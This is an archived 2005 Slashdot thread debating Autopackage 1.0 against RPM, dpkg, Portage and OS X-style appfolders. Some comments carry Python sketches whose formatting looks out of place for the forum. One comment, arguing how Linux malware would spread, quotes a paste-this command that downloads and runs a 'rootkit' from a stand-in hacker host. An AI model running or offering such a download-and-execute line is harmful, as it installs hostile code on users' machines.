
AutoPackaging for Linux

Isak Savo writes "The next generation packaging format for Linux has reached 1.0. With Autopackage officially declared stable, there is now an easy way for developers to create up to date, easy installable packages. There are lots of screenshots available including a flash demo of a package installation."
This discussion has been archived. No new comments can be posted.
  • by karmaflux ( 148909 ) on Sunday March 27, 2005 @03:43PM (#12061131)
    Not everyone wants to tie themselves to a huge complex packaging system. Some of us are perfectly happy with checkinstall. Thanks anyway.
  • by mp3phish ( 747341 ) on Sunday March 27, 2005 @03:54PM (#12061206)
    Because maybe your package is a small project not yet picked up by the distributions. Are you as the maintainer going to package it for debian, mandrake, redhat, and suse? Or would you rather convert your tarballs into autopackages?

    I think if I were an upstart package, and nobody were packaging me for their distro, I would want to be converted to an autopackage.
  • I'm a gentoo user as well, but I'm very excited by Autopackage. The whole reason many people use gentoo is b/c it is so easy to install software. The main problem with that system is that someone has to add it to the portage tree, and if it's not popular enough, it won't get in... with Autopackage you put the installation in the developers hands and you no longer have to rely on your distro to do it for you. I say use Portage/Apt/Whatever for your system/low-level programs and use autopackage for your higher level ones (Firefox, Gaim, GIMP, etc)...Autopackage could finally be the answer many Windows users have been waiting on to make the switch!
  • Re:Wrong Paradigm (Score:2, Interesting)

    by isaks ( 871187 ) on Sunday March 27, 2005 @04:01PM (#12061239) Homepage
    Whether the package is a self-extracting installer or an rpm/deb/whatever doesn't make the slightest difference. It all boils down to whether you trust the author of the package or not. A major difference with autopackage wrt rpm/deb/whatever is that the upstream software author creates the package, not random packager Joe. If you don't trust the author, you shouldn't be using the software, regardless of package format!
  • Re:Linux (Score:3, Interesting)

    by Doc Ruby ( 173196 ) on Sunday March 27, 2005 @04:07PM (#12061270) Homepage Journal
    Which platform had packages installable from the Net, with dependencies and versioning, by clicking a single GUI button, in 1990? Or typing "installer install package"? One of the reasons I prefer Debian to Windows is precisely because of the package method of SW distribution. The closest MS has come is its WindowsUpdate abominations.
  • by jesterzog ( 189797 ) on Sunday March 27, 2005 @04:12PM (#12061300) Journal

    I'm presently running Debian. I've briefly played with making my own .deb files so I'd be able to install some of my own things without necessarily completely losing track of everywhere they were scattered. With all of the extra meta files that need editing, the source packages versus binary packages, and everything else, though, the whole process of designing a .deb package looked a bit too structured and complicated for me to bother learning about... at least within the time I was prepared to spend.

    If AutoPackage has a straightforward way to generate a simple package, such as from a tar.gz file, I might find it very helpful. What I'm wondering about, though, is how bad does it get when two package managers conflict? E.g. Apt and AutoPackage might end up trying to control the same file, get mixed up about which manager is providing a particular dependency (particularly if Apt tries to grab a package that AutoPackage has already installed), or whatever else.

    It also sounds a bit of extra work having two sets of commands to manage packages on one system, so ideally (in my world), I guess AutoPackage would wrap around Apt or whatever other manager, and invoke it when appropriate. Does AutoPackage just fight for control when there are conflicts, or does it integrate with other package managers nicely?

    The server seems to be very slashdotted right now, so I can't do much reading up on it. Does this sort of conflict thing turn out to be much of a problem?
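    The conflict question can be made concrete: a collision is any path that two package databases both claim to own. A minimal Python sketch with invented data (not Apt's or Autopackage's real on-disk formats):

```python
# Hypothetical file-ownership maps for two package managers.
# Real managers keep these in their own databases (e.g. dpkg under /var/lib/dpkg).
apt_owns = {
    "/usr/bin/gaim": "gaim_1.1.0-1",
    "/usr/lib/libgtk.so.2": "libgtk2.0_2.6.2-3",
}
autopackage_owns = {
    "/usr/bin/gaim": "gaim-1.1.4.package",       # same path as Apt's gaim
    "/usr/bin/inkscape": "inkscape-0.41.package",
}

def find_conflicts(db_a, db_b):
    """Return every path claimed by packages in both databases."""
    return sorted(set(db_a) & set(db_b))

print(find_conflicts(apt_owns, autopackage_owns))
```

    Any real integration would have to consult both databases before writing a file; without that, whichever manager installs last silently wins.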

  • by levell ( 538346 ) on Sunday March 27, 2005 @04:20PM (#12061333) Homepage
    Until I can install an autopackage on my FC3 desktop and rpm (and therefore yum) can use it in dependency resolution and update it then I don't intend to use it.

    This isn't meant as a criticism; I realise that they plan to do this and it takes time - doing everything that everyone wants is a long process ;)
  • Comment removed (Score:4, Interesting)

    by account_deleted ( 4530225 ) on Sunday March 27, 2005 @04:22PM (#12061347)
    Comment removed based on user account deletion
  • Re:Linux (Score:1, Interesting)

    by Anonymous Coward on Sunday March 27, 2005 @04:31PM (#12061385)
    Since when? All the Windows applications I've run into only have one installer and they work fine on all Win32-based machines. Some websites provide two different versions, one for Win9x/ME and one for Win2000/XP, but the ones I've seen are doing it solely for optimization purposes.
    Of course there are certain programs that *only* work on an NT kernel and those don't even come for Win9x/ME, but that is not the issue here.
  • Re:Wrong Paradigm (Score:3, Interesting)

    by labratuk ( 204918 ) on Sunday March 27, 2005 @04:36PM (#12061404)
    Bittorrent calls you a liar, buddy. We trade 5.25" floppies in a metaphorical sense constantly.

    That's content, not programs. Completely different. And when it's Linux ISOs, they're always the same because they are checked against the hashes. The end result is the same thing as having a very fast FTP.

    When I develop a program that takes random input and outputs Frank & Ernest cartoons, I don't want to have to wait for some Board of Linux Usage Oversight to give my 5k perl script the Stamp of Approval.

    Then don't. Package it with autopackage, rpm, a tarball, whatever, just beware that users installing it could screw with the way the distro wants things to be done and could mess things up.

    Your average desktop user does not want to compile software. Dropping to a terminal, cd pathtoapp, tar -zxvf whatever.tar.gz, cd newpath, ./configure; make; make install is too much shit for a user.

    Nobody is saying that. Straw man.

    What a user can do is use yum, apt, yast, emerge, or a gui tool like synaptic. That's not difficult.

    Don't just slap their hand and yell NO.

    Nobody's doing that. They're still able to install whatever software they like from wherever they like, but if it causes problems for you, well, I'm probably not going to be able to help you with it buddy.
  • Re:BackPackage (Score:5, Interesting)

    by IamTheRealMike ( 537420 ) on Sunday March 27, 2005 @04:42PM (#12061430)
    The really big leap in backends would be a distributed repository.

    I suspect you are thinking of something like Conary. That said, a distributed and decentralised package management system is what autopackage is all about. Autopackages can resolve dependencies in a manner that does not require large monolithic databases: the packages themselves know where to go to find their dependencies if they're missing (and in future they'll be able to use yum, apt-get etc. as well, just in case).

    Basically the apt-get type model doesn't work too well once you start having, say, more than 50 repositories altogether, as co-ordinating the overlaps becomes too much of a nightmare. A much less tightly coupled system works better, which is what we have here.
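    The decentralised model described here can be sketched in a few lines: each package carries the download locations of its own dependencies, so resolution is a depth-first walk with no central index. Package names and URLs below are invented; this is not autopackage's actual metadata format:

```python
# Hypothetical metadata: each package knows where its own dependencies live,
# so no central repository index is needed.
PACKAGES = {
    "inkscape": {"deps": ["gtkmm"], "url": "http://example.org/inkscape.package"},
    "gtkmm":    {"deps": ["gtk"],   "url": "http://example.org/gtkmm.package"},
    "gtk":      {"deps": [],        "url": "http://example.org/gtk.package"},
}
installed = {"gtk"}  # already on the system, so never downloaded

def resolve(name, plan=None):
    """Depth-first walk: collect download URLs for missing deps, deps first."""
    if plan is None:
        plan = []
    meta = PACKAGES[name]
    for dep in meta["deps"]:
        if dep not in installed:
            resolve(dep, plan)
    if meta["url"] not in plan:
        plan.append(meta["url"])
    return plan

print(resolve("inkscape"))
```

    A yum/apt-style backend could then be tried first for each missing dependency, falling back to the embedded URL only when no repository provides it.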

  • by k8to ( 9046 ) on Sunday March 27, 2005 @04:45PM (#12061452) Homepage
    Every time autopackage gets mentioned, I look into it, only to come away lost as to what problem the project is trying to solve.

    It claims to provide binary packages which will install on any distribution, but I don't see any sort of information about how the project plans to address the fact that binary interfaces on linux systems are moderately unstable. It just seems quixotic.
  • by Anonymous Coward on Sunday March 27, 2005 @04:58PM (#12061516)


    http://zero-install.sourceforge.net/ [sourceforge.net]

    A young project but quite revolutionary. Applications run from cache. A GUI to this for those not friendly with the CLI could be significant.

    Make sure you read the page to understand what it offers and why.

    By the way I prefer the Debian way of installing software, it's a no-brainer.

    I use the CLI but my 10 year old cousin uses http://kefk.net/Linux/Distributionen/Allgemein/Fedora/Versionen/Core.1/Screenshots/kpackage.png [kefk.net] KPackage as an interface to apt.

    Just Works TM.
  • by keesh ( 202812 ) on Sunday March 27, 2005 @05:16PM (#12061627) Homepage
    LSB is a redhatism. Some parts of it are utterly daft. You know that X is mandatory under LSB, right?
  • by DeepHurtn! ( 773713 ) on Sunday March 27, 2005 @05:48PM (#12061765)
    It also claims to be able to keep track of dependencies regardless of how you installed the package: source, rpm, etc. That is also very nice. I hope this works well and catches on with projects -- I imagine it would make both developers' and users' lives easier.
  • Portage would never be ported (no pun intended) to *BSD, because we already have Ports.

    Don't tell these people [gentoo.org].
  • by Anonymous Coward on Sunday March 27, 2005 @06:16PM (#12061909)
    "The whole reason many people use gentoo is b/c it is so easy to install software"

    Hmm.

    --
    $ emerge --pretend --update world
    These are the packages that I would merge, in order:

    Calculating world dependencies /
    !!! All ebuilds that could satisfy ">=dev-libs/boehm-gc-6.4" have been masked.
    !!! One of the following masked packages is required to complete your request:
    - dev-libs/boehm-gc-6.4 (masked by: ~x86 keyword)

    For more information, see MASKED PACKAGES section in the emerge man page or
    section 2.2 "Software Availability" in the Gentoo Handbook.
    !!! (dependency required by "media-gfx/inkscape-0.41" [ebuild])

    !!! Problem with ebuild media-gfx/inkscape-0.41
    !!! Possibly a DEPEND/*DEPEND problem.

    !!! Depgraph creation failed.
    --

    OK, so that's my fault - I've unmasked Inkscape and now the latest masked version has another masked dependency.

    There are two problems here.

    1) I had to unmask some packages to get them to work. Notably Meld, which has been unmasked since I first tried to install it last year and discovered that the "stable" ebuild was actually completely broken and wouldn't even compile. There were lots of posts on forums and bug reports about it for months but it remained broken; the standard solution was "unmask it and use a newer one, they work fine!". So, there's some slack QA going on somewhere - either the new packages are OK to unmask and it should be done upstream, or the old one should be fixed. Inkscape was similar, but not quite as severely broken. aMule is the same - the "stable" 1.2.8 version in Portage is actually extremely unstable and buggy, and it's presently impossible to build any of the (much more stable) 2.0-pre series without doing a USE="-GTK2" and getting a seriously ugly GUI.

    2) Emerge is bombing out cheerfully when I try to update purely because it's hitting one dependency problem on Inkscape. It would make more sense for it to ignore any available updates to Inkscape and try to update the rest of my software, like Firefox. Maybe there's an obscure switch for this I haven't read up on, but it's hardly "... so easy to install software!".

    Gentoo is technically quite interesting, but it has the occasional package management snarl-up - just like all the other distros!

    Autopackage seems like a good idea to me too, though.
  • by roskakori ( 447739 ) on Sunday March 27, 2005 @06:34PM (#12061993)

    I read the developer quickstart guide, and still can't figure out if this will help me with integrating a Java application.

    Right now, I use an installer based on IzPack [izforge.com], which works but results in an application that must be started from a shell script and does not integrate into the desktop. In particular, the user cannot just double-click files that have been created with my application. Also annoying is the fact that the installer includes trivial libraries like log4j, which causes bloat. And worse, some libraries have to be downloaded manually, in my case JAI [sun.com]. I'd say my application is a horrible user experience under Linux.

    However, the developer quick guide just keeps talking about C compilers, GTK and other stuff I don't use or care about. Is there any point in taking a closer look at autopackage?

  • by agraupe ( 769778 ) on Sunday March 27, 2005 @06:57PM (#12062108) Journal
    and I was amazed by how well it worked! I think this could easily be the answer to the linux software installation problem. I am a gentoo user, and I like portage, but autopackage is a slick piece of software. Perhaps it could be used in conjunction with portage (i.e. remove the idea of "gentoo packages" for end-user-type-apps and make portage interface to autopackage). Either way, I think that a stable Autopackage definitely is a step forward for desktop linux.
  • by Storlek ( 860226 ) on Sunday March 27, 2005 @07:46PM (#12062372)
    I'd like to see a GUI wrapper around ./configure && make && make install -- a window with checkboxes for all the different --enable and --with options, a button to change what directories the program is installed to, and a "build" button at the bottom. Do all the configuring in a hidden embedded terminal widget, and have a "details" button for people who really want to look at the stuff scrolling by. It could be written with PyGtk (or whatever else; maybe it could even detect KDE or Gnome and use the appropriate toolkit) so it'd run on any architecture, maybe even have extensions to call apt-get or rpm to automatically resolve dependencies for the major distributions.

    This could even be done with a shell script wrapper around a tar.bz2 file (think shar, or the old StarOffice installer), so when it's double clicked in the file manager it would untar itself into a temporary directory and install.
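    The option-discovery half of such a wrapper is fairly mechanical, since `./configure --help` output follows a regular pattern. A rough sketch in Python (the sample help text is invented; real configure scripts vary in layout):

```python
import re

# Sample of what `./configure --help` typically prints (assumed format).
HELP_TEXT = """
Optional Features:
  --enable-debug          turn on debugging
  --enable-gtk-doc        build documentation
Optional Packages:
  --with-x                use the X Window System
  --with-libpng=DIR       prefix for libpng
"""

def extract_options(text):
    """Pull the --enable-*/--with-* flags out of configure help output."""
    return re.findall(r"--(?:enable|with)-[A-Za-z0-9-]+", text)

print(extract_options(HELP_TEXT))
```

    Each extracted flag would become a checkbox in the GUI, and the chosen set would be passed straight through to the real ./configure invocation.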
  • by doc modulo ( 568776 ) on Sunday March 27, 2005 @07:52PM (#12062421)
    Mod parent up please!

    Packages are much more complicated conceptually (files all over the place for example) than appfolders.
    Then why use packages? I think the reasons are:
    1. Efficiency of HD space and memory
    2. Some things are easier to do with files all over the place.

    In the end, it's millions of people who have to put up with the confusing situation of packages just so that a few very smart developers can have it easier. That's the wrong way around! Even those same developers USE the program many more times than they have to package it up.

    #1 Efficiency on the HD is not THAT important anymore. Multiple copies of libraries on your HD inside different appfolders are doable. Efficiency inside RAM can probably be the same as with packages. Maybe make a big index of all the libraries that are available inside the appfolders on the system.

    #2 There MUST be ways around the problems with appfolders. There are only a couple minor ones left. Programmers are supposed to be smart, persistent people. As I said, there MUST be a way around the problems.
    Maybe a Daemon that keeps a lookout for everything that has to do with appfolders.

    Daemon: "Oh there's a new appfolder in the /programs folder? Let's update the library index with the libraries found inside it"
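    That daemon's core job - building a library index from whatever appfolders exist - might look something like this sketch, assuming a hypothetical layout where each appfolder keeps its bundled libraries under lib/:

```python
import os
import tempfile

def index_libraries(programs_dir):
    """Walk every appfolder and map each library name to its locations."""
    index = {}
    for root, _dirs, files in os.walk(programs_dir):
        for name in files:
            if name.endswith(".so") or ".so." in name:
                index.setdefault(name, []).append(os.path.join(root, name))
    return index

# Build a fake /programs tree: two appfolders bundling the same library.
top = tempfile.mkdtemp()
for app in ("Gimp.app", "Gaim.app"):
    libdir = os.path.join(top, app, "lib")
    os.makedirs(libdir)
    open(os.path.join(libdir, "libglib-2.0.so.0"), "w").close()

idx = index_libraries(top)
print(sorted(idx))                    # one library name ...
print(len(idx["libglib-2.0.so.0"]))   # ... bundled in two places
```

    A real daemon would watch the /programs folder with something like inotify and update the index incrementally, rather than rescanning; the index is also where deduplication of shared libraries could start.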

    I don't know exactly, but what I DO KNOW is that working out all the puzzles surrounding appfolders will in the end make life much better for millions of people. MAYBE the programmers will have to do a little extra work or be just a little bit smarter (probably not), but they ARE the smart ones in this scenario; if there's anybody who has to jump through hoops, it's supposed to be the programmers, not the users. Besides, programmers are mostly program users as well, so they'll get the big benefits just as mortals will.

    In the end you cannot talk your way out of this: PCs are supposed to be our slaves and take away work. Users should be able to work with a PC like THEY would like to work with it (appfolders, GUI etc.).

    When you're saying "PC users should learn this and that to install a program", you're basically saying we should steer the evolution of the human race (a program is a thing, like this rock I can pick up) into a new direction just so people can work with PCs and packages as they are now.

    The PC will improve and change very fast, it should be in the right direction. That direction is to make the PC into something an average human, evolved over millions of years, can use as easy as possible.
  • Re:Wrong Paradigm (Score:3, Interesting)

    by internic ( 453511 ) on Sunday March 27, 2005 @07:54PM (#12062428)

    I don't know much technical detail about software packaging, either in Windows or Linux, so I can only speak from my experience. My experience has been that package management in Linux is much preferable to Windows. When I used Windows 2000, I would often install software that later could not be completely uninstalled (broken uninstall), and often software that was installed would make undesirable and unauthorized changes to settings like file associations. I'm not talking about malware here, just legitimate software behaving badly.

    Since I've been using Linux, I find that installing packages has predictable results without the unpleasant side effects I mentioned before, and I have yet to have any issues completely removing unneeded software. What's more, installation is generally simpler and more rapid, e.g. apt-get install foo. This was true using both apt-get and urpmi. I won't attempt to claim this is universal, I will only say that it's my experience.

    I always thought that in Windows the installer was a standalone program that could essentially do whatever it wanted, and uninstallation depended on the good graces of that software. I'm not sure that this is the case, but it seems to fit my experiences. That system always seemed backward to me, because I'd rather that a trusted program on my system perform installation tasks and keep track of them for later removal. This seems to be what happens in apt-get-like systems, and it has led to much more desirable results in my case.

  • Re:Missing the point (Score:3, Interesting)

    by Minna Kirai ( 624281 ) on Sunday March 27, 2005 @09:12PM (#12062789)
    It's meant to aid the installation of packaged software from third party sources and manage dependencies in order to accomplish this. That is specifically my problem with it: it is a tool for enabling dangerous behaviour for inexperienced users.

    The factor blocking the deployment of "malware" to Linux isn't the intractability of Linux software installing, but the low population size of unskilled users, and the low exploitation value of that population (the same as the largest reason there are few "viruses").

    Do not imagine that if Linux had the popularity of Microsoft(tm) Windows(r), it would take the malware coders more than a week to get into business. All they need is to provide executable files to run, and end-users they can convince to download files and then double-click them (assuming that Linux web browsers continue to non-autoexecute downloaded binaries). Once they've run that one binary, it can either execute the malware immediately, or merely install it in the user's writable disk space (including ~/.login, as well as ~/.firefox and maybe elsewhere).

    If a system administrator feels her users are at risk of installing malware, she is well able to disallow execution of files in their home directories. This will prevent home-grown attacks (like "paste these 3 lines into a terminal: wget http://download.hacker.com/rootkit;./rootkit"), and also make autopackage impotent as a side effect. (An admin with this attitude would also disallow users from running autopackage at all, of course.)
  • by Nailer ( 69468 ) on Sunday March 27, 2005 @09:22PM (#12062821)
    The FAQ answers that question with:

    What RPM is not good at is non-core packages, ie programs available from the net, from commercial vendors, magazine coverdisks and so on.

    Why not? If you're going to spend a metric shitload of time creating a new packaging format and you want anyone to use it, some actual justification might help.

    Personally, I'd add non-DB backends, suggests/recommends, and non-root installs to RPM, or add better file/signature verification, a DB backend, and non-root installs to dpkg.
  • by Nailer ( 69468 ) on Sunday March 27, 2005 @09:41PM (#12062905)
    Actually, I'll bite on some of his later answers, where, unlike in the answer to the previous question, he does go through some specific issues he has with RPM/dpkg:

    "Other dependencies are not so simple, there is no file that reliably expresses the dependency, or the file could be in multiple locations"

    Yes, that's what virtual dependencies / capabilities in both rpm and dpkg provide. As for files moving around, that's what the FHS is for.

    But in reality, you don't encounter this scenario until you install rpms/debs on another distro. Big deal: binary packages will always be built against specific library versions. Autopackage doesn't solve that.

    "because RPM is, at the end of the day, a tool to help distro makers, they sometimes add new macros and features to it and then use them in their specfiles. People want proper integration of course, so they use Mandrake specific macros "

    That's a human problem. You can't fix it with technology. Taking away the ability to have custom macros is a bad thing. Encouraging proper behavior is a better thing.

    "Bad interactions with source code: because the current versions of RPM don't check the system directly, they only check a database"

    You don't mean bad interaction with source code. Installing from source works fine: provided you know how to run make install, you can easily create an RPM of most autoconf apps in about 2 minutes.

    You mean bad interaction with non-packaged software. Again, that's a human issue, but one that's been solved better and better over time. Both OSS projects and proprietary vendors, including Adobe, BEA, Macromedia etc., all release properly packaged binaries.

    And frankly, I like having a database. I want to be able to find out what package was responsible for installing a file, and a URL where I can get a new version of the software. I like having a checksum of all my files at install time, so I can see if they've changed later. None of which autopackage does.
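    The checksum bookkeeping being praised is easy to picture: hash every file at install time, store the digests, and re-hash later to spot local modifications. A simplified Python sketch of the concept (RPM keeps this in its own database, and `rpm -V` does the comparison):

```python
import hashlib
import os
import tempfile

def record_checksums(paths):
    """What an RPM-style database stores for each file at install time."""
    db = {}
    for p in paths:
        with open(p, "rb") as f:
            db[p] = hashlib.md5(f.read()).hexdigest()
    return db

def changed_files(db):
    """Re-hash every recorded file and report the ones that differ."""
    changed = []
    for p, digest in db.items():
        with open(p, "rb") as f:
            if hashlib.md5(f.read()).hexdigest() != digest:
                changed.append(p)
    return changed

# Simulate an install followed by a local edit.
d = tempfile.mkdtemp()
cfg = os.path.join(d, "app.conf")
prog = os.path.join(d, "app")
for path, data in ((cfg, "color=blue\n"), (prog, "#!/bin/sh\n")):
    with open(path, "w") as f:
        f.write(data)

db = record_checksums([cfg, prog])
with open(cfg, "w") as f:
    f.write("color=red\n")    # user edits the config after install

print(changed_files(db))      # only the edited file shows up
```

    Without such a record, a package manager can only guess whether a file on disk is still the one it installed.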

    I don't like anything that encourages people to install unsigned applications from the internet, which autopackage does.

    "a dependency does not encode any information on where to find it"

    Yes, great that they kept that shit out of the dependency, isn't it? Because what provides that capability isn't determined by the software. My app needs a webserver. That could be thttpd, Apache httpd, Roxen, or whatever else. Rather than specifying what package provides that dependency, they simply list the dependency. Three of my available packages say they provide a webserver capability. When a new webserver comes out, it will say it provides that capability too, without requiring a new package of the thing that wants a webserver. Brilliant stuff!
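    The capability mechanism described works roughly like this sketch: a dependency names an abstract capability, and any package declaring that capability satisfies it. The provides table below is illustrative, not a real distribution database:

```python
# Hypothetical provides database: packages declare abstract capabilities,
# and a dependency names the capability rather than a specific package.
PROVIDES = {
    "apache-httpd": ["webserver"],
    "thttpd":       ["webserver"],
    "roxen":        ["webserver"],
    "postfix":      ["mail-transport-agent"],
}

def providers(capability):
    """Every package that satisfies a virtual dependency."""
    return sorted(p for p, caps in PROVIDES.items() if capability in caps)

print(providers("webserver"))   # any one of these satisfies "needs a webserver"
```

    This is essentially how Debian's virtual packages and RPM's Provides: tags behave: the dependency stays stable while the set of providers grows.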

  • by idlake ( 850372 ) on Sunday March 27, 2005 @09:48PM (#12062926)
    YOU might manage to get everything you need out of the software included in your distro, but do you really expect the big distros to anticipate every single need of every single user?

    The way it works out in practice on Debian is that, for most people, once it's mature enough to be included in the distro, it's part of the distro. Until then, you probably want to install it from source anyway, which is an option you always have.

    Should a good distro include a version of GAMESS just because I want to do a theoretical chemistry calculation?

    Yes. More accurately, someone should become a binary package maintainer for each distribution. As part of that, that person has to assume responsibility for not breaking anything in the distro. Creating an "Autopackage" and pretending that that solves the integration problems "automatically" just isn't going to do the trick; you might as well only distribute the sources.
  • A few quick comment on your FAQ:

    The first reason is the lack of dependency management. Because you are simply moving folders around, there is no logic involved so you cannot check for your app's dependencies.

    OS X handles this at runtime, i.e. you can install the software, but the folder contents contain enough information for the OS to give you an error message when you run it. Usually this amounts to nothing more than "OS X 10.3 required!", but it could be more. FWIW, I think the lack of a "standard" set of OS services in Linux complicates this issue. Under OS X (and to a certain degree Windows), developers always know which libraries they can always depend on, and which ones they should bundle.

    You'll note that bundled APIs on OS X and Windows tend not to duplicate each other across a given set of installed programs.
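    The runtime check described above amounts to comparing the bundle's declared minimum OS version against the running system before launch. A toy sketch (dictionary keys invented, loosely modelled on the minimum-system-version idea in a bundle's Info.plist):

```python
# A bundle carries its own minimum-OS requirement; the launcher checks it
# at run time instead of at install time (hypothetical metadata keys).
bundle_info = {"name": "MyApp", "minimum_system_version": (10, 3)}
running_system = (10, 2)

def can_launch(info, system):
    """Tuple comparison gives correct ordering for (major, minor) versions."""
    return system >= info["minimum_system_version"]

if not can_launch(bundle_info, running_system):
    print("OS X %d.%d required!" % bundle_info["minimum_system_version"])
```

    The install step stays a dumb folder copy; all the dependency logic runs at launch, which is the trade-off being described.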

    One obvious one is that there is no uninstall logic either, so the app never gets a chance to remove any config files it placed on the system.

    This would be true on Linux, but it is NOT true on OS X. In OS X, the desktop integrates with the filesystem and learns via events when an application is added or deleted. This means that OS X users see file associations as soon as the program is added to the system, and they also see the deletion of those associations when the program is removed. It's all very seamless and prevents the dangling associations that plague Windows.

    The OS X FS takes things one step further by storing file system IDs instead of path names for everything. This means that if I move my program from the Desktop to Applications, the associations will move with it. Similarly, if I have a file open and I move it, my file will save to the new location instead of the old one.
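    The "track the identity, not the path" behaviour has a rough Unix analogue: an inode number survives a rename within the same filesystem, so a file can be found again after it moves. A small demonstration:

```python
import os
import tempfile

d = tempfile.mkdtemp()
old = os.path.join(d, "report.txt")
with open(old, "w") as f:
    f.write("hello")

# Remember the file by its filesystem identity, not its path.
ident = os.stat(old).st_ino

new = os.path.join(d, "moved-report.txt")
os.rename(old, new)   # same filesystem, so the inode is preserved

# The path changed, but the identity survived the move.
print(os.stat(new).st_ino == ident)   # True
```

    Plain inode numbers only hold within one filesystem and one boot; the OS X mechanism being described layers persistence and cross-volume tracking on top of this basic idea.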

    Another is that the app menus are largely determined by filing system structures. This means that it's hard to have separate menus for each user/different desktop environments without huge numbers of (manually maintained) symlinks.

    1. An application menu IS just a bunch of glorified symlinks.

    2. OS X handles this by having a system wide Applications folder for all users. If users wish to have private programs, they can drag them to their desktop or home folder.

    3. The dock is the user's customized menu. The most commonly used apps are usually already there so that users don't have to hunt for them. If a user wants another app on his dock, he can drag it on there to create a shortcut. Shortcuts are deleted by dragging the icon off the dock or into the trash can.

    What your FAQ should say is, "Unfortunately, the Linux design philosophy precludes the use of an appfolders system, as the services required to make such a system work are most likely unavailable on most installations."

    Now with that cleared up, good job guys. I'm glad to see that someone is finally tackling my number one Linux gripe. (Check my Journal for more info.) :-)
  • by marafa ( 745042 ) on Monday March 28, 2005 @03:58AM (#12064500) Homepage Journal
    The makers of CUPS, the Common Unix Printing System, have another product called EPM (Easy Package Management), available at http://www.easysw.com/epm/ [easysw.com].

    EPM is a free UNIX software/file packaging program that generates distribution archives from a list of files.
    EPM Can:

    * Generate portable script-based distribution packages complete with installation and removal scripts and standard install/uninstall GUIs.
    * Generate "native" distributions in AIX, BSD, Debian, HP-UX, IRIX, MacOS X, Red Hat, Slackware, Solaris, and Tru64 UNIX formats.
    * Provide a complete, cross-platform software distribution solution for your applications.

    ____
    to the guy marking my comments as -1: why?
  • by FooBarWidget ( 556006 ) on Monday March 28, 2005 @06:34AM (#12064861)
    Native package manager integration is planned for post-1.0.
